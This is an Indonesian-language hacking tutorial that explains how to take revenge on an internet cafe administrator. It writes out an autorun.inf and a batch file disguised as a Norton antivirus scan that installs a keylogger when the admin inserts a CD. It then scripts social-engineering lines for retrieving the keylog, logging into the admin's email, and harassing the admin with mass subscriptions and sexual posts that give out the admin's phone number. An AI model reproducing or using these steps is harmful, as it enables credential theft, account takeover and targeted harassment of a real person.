Pembablasan

Pembablasan

Semakin paranoidnya para admin belakangan ini menyebabkan banyak

pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman.
|—[Table of Content
1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
[+] Kesimpulan
[+] Referensi
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak

pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (

pembatasan) disanasini
(walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu

inspirasi bagi
banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu

dan saling menshare
pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan

dan dikemas
menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri

sampai tak
jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin

menjadi
semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan

melarang user
untuk melakukan segala bentuk transfer file dari media penyimpanan

sementara (disket,
cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan

fenomena yang
akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe.

Admin mulai rajin
mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan

oleh kaum
newbie menjadi “rongsokan” tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk

menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system

yang 100%
secure.
2. Serangan pertama
Kita akan menjadi seorang “agen mata-mata” (hehehe.. gw pake istilah

ini biar ente
merasa agak sedikit keren) yang akan merekam segala aktivitas sang

admin. Tujuannya..
banyak! dan salah satunya seperti hal yang banyak diinginkan orang..

mendapatkan
password sang admin. Partner kita kali ini adalah navw32.exe, sebuah

keyloger dengan
icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga

cuma-cuma di
halaman member kategori Keyloger. Setelah kamu download keyloger

tersebut, ikuti
langkah-langkah berikut:
—[1 Bukalah Notepad kemudian ketik satu baris script berikut:
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan

pada form isian
name beri nama Autorun.inf lalu klik tombol [save].
—[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu

ketik script
berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive…
echo Please wait…
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan

pada form isian
name beri nama nav.bat lalu klik tombol [save].
—[3. Persiapkan beberapa file microsoft word documents (bisa diganti

dengan file lain)
sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin

baik karena file
keyloger kamu akan semakin tersamarkan.
—[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua

file diatas
(autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah

seperti biasa dan
jangan gugup selayaknya para koruptor yang sering nampang di satasion-

stasion TV
tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi

sang admin.
Katakan pada beliau, “Mas/mbak/om/tante/, mau transfer file dari cd

ini. Nama filenya
blablabla tolong dikirim ke komputer nomor blablabla.”
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis —> file

autorun.inf akan
memproses file nav.bat —> file nav.bat akan menduplikasi file navw32.

exe ke dalam
directory windows dan mengaktivkannya —> Keyloger telah terinstall,

hasil rekamannya
akan tersimpan di directory yang sama dengan nama navw32.dll beratribut

hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-

lagi) kamu
bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis

menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory

windows sang
admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah

secara wajar dan
beraktivitas seperti layaknya user biasa. Setelah selesai berinternet

ria, datangi sang
admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-

sangat memelas
seperti pengemis di jalanan :) katakan pada beliau,”Mas/mbak/om/tante/,

komputer saya
bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang

berada di
directory windows hilang. File tersebut beratribut hidden. Tolong doong

copykan dari
komputer ini. Kebetulan versi windowsnya sama dengan komputer saya..”
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu

kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show

All files
pada Folder Options dan mengcopy-kan file navw32.dll dari directory

windows tanpa
menyadari bahwa file tersebut bukan file system, namun file hasil

rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan,

ucapkan beribu terima
kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x

pada file lalu ketika
muncul kotak dialog open with, klik opsi select program from a list dan

pilih notepad
pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang

admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin

mungkin sedang
terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.

Namun ada
baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet

yang buka 24
jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang

admin. Setelah
puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar

dengan email
tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan

dilakukan deech..).
Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah

pesan singkat,
memikat dan “mematikan”. Berikut contohnya jika milis tersebut

berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh

no telp gwe:
021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Atau jika berbahasa Inggris:
Dear,
Wanna play “freestyle” with mw? Please call me : 062-021-blablabla
You may F**k me for free!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih

kata-kata yang
yahuud!! :)
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling

mengerikan
bagi sang admin, lebih mengerikan daripada film-film horor manapun!

Telepon
rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam

dan luar negeri
dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya :)
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang

admin akan
kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email

dari berbagai
milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-

milis itu. Dan bisa
jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut,

telepon rumahnya masih
terus-terusan menjerit-jerit dengan jeritan indah :)
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas,

maka setiap
kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil

memasukkan
CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift

sampai kirakira
25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya

melalui
windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada

daftar drive
sebelah kanan karena fitur autorun akan aktif.
6. Penutup
—[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan

dampak yang
sangat berbahaya. Ini hanya merupakan contoh Social Engineering

sederhana namun
berdampak luar biasa, untuk memancing ide kreatif anda.
—[+ Referensi
Self implementing
Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar

anda brfikir
jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah

menolak cinta
anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas.

Ada baiknya
anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!!

perbaiki
penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan

kecurangan,
menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker,

maka anda
bisa membungkam mulut besar mereka dengan cara ini.